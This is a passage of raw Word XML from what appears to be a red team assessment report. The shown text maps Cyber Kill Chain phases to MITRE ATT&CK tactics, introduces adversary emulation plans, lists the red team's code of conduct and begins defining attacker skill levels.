          <w:p w14:paraId="2150405C" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1EC1C06C" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="4109B1F0" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="32A85878" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7F56D3D6" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Defence Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="3E14D250" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2BFC29B8" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03D9300B" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="09E3AAE5" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3FD5295E" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6FA0E0F9" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="4F876B38" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="7E1FBF2C" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="22F5ECBA" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="288CF314" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="19292068" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59CD002F" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="47F9BA7E" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="4255FE3D" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actions on objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="780737EF" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="4DBDCA2E" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="5274588D" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5475FED3" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="040F43B2" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="05022546" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3E5CAABF" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58A4C321" w14:textId="099D20B2" w:rsidR="00A66D5A" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc211963073"/>
      <w:bookmarkStart w:id="71" w:name="_Toc213253591"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Cyber Kill Chain mapping to the MITRE ATT&amp;CK matrix.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="4E3AF172" w14:textId="77777777" w:rsidR="00A66D5A" w:rsidRPr="001019D3" w:rsidRDefault="00A66D5A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3C1AA5" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="009710C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc212654634"/>
      <w:bookmarkStart w:id="73" w:name="_Toc213253540"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Adversary emulation plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="72D70FBE" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The MITRE Adversary Emulation Plans outline the behaviour of persistent threat groups mapped to ATT&amp;CK. They are used by the Red Team to test an organization’s security posture against specific threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F83EA21" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B008E7" wp14:editId="773D8E33">
            <wp:extent cx="4900101" cy="2252183"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105735312" name="Picture 10573531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312" name="Picture 105735312" descr="A diagram of a proces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00101" cy="2252183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9C270" w14:textId="453BDA63" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc213253787"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Adversary emulation plan.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="6B652358" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="009710C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc212654635"/>
      <w:bookmarkStart w:id="76" w:name="_Toc213253541"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Code of conduct</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="2209CCF3" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team abides by a strict code of conduct. The primary guiding principles of the Red Team’s code of conduct include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0841FE" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Do not intentionally perform destructive actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8A48E" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Do not intentionally access or modify customer data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422DE262" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Do not intentionally cause customer Service Level Agreement (SLA) impact or downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75529ABF" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Do not weaken in-place security protections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0786B9" w14:textId="2F4A88A8" w:rsidR="00A66D5A" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Safeguard vulnerability and other critical information within the Red Team and only share those with a need-to-know.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596953AC" w14:textId="77777777" w:rsidR="00A66D5A" w:rsidRPr="001019D3" w:rsidRDefault="00A66D5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="340F1D1B" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00D51507">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc212654636"/>
      <w:bookmarkStart w:id="78" w:name="_Toc213253542"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Report interpretation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="29667491" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Various scales, ratings and definitions are used throughout the report that are explained below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D855669" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00437E8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc212654637"/>
      <w:bookmarkStart w:id="80" w:name="_Toc213253543"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Attacker skill level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="2F50DFF9" w14:textId="2B56CB04" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Attacker skill levels are categorized in different ways, but generally reflect an attacker's resources, sophistication, and ability to discover and exploit vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="0049066F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. This could </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>rang</w:t>
      </w:r>
      <w:r w:rsidR="0049066F" w:rsidRPr="001019D3">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidR="0049066F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">low unsophisticated skills, like </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>basic use of off-the-shelf tools</w:t>
      </w:r>
      <w:r w:rsidR="00A66D5A" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>to highly advanced capabilities like discovering zero-day vulnerabilities or developing custom exploits</w:t>
      </w:r>
      <w:r w:rsidR="00A66D5A" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD279A" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following table is based on MITRE’s way of defining a cyber threat level, which is used in this report to define the skills necessary to find and exploit the found vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1419"/>
        <w:gridCol w:w="3199"/>
        <w:gridCol w:w="3351"/>
      </w:tblGrid>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="1E3ED77A" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="444" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="29D5181D" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="811" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6F0AC9DA" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Skill level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1829" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BEEAEAE" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Typical actors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5EAFEDB3" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Typical goals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="478B96B1" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="444" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BDD28ED" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="811" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E78027D" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
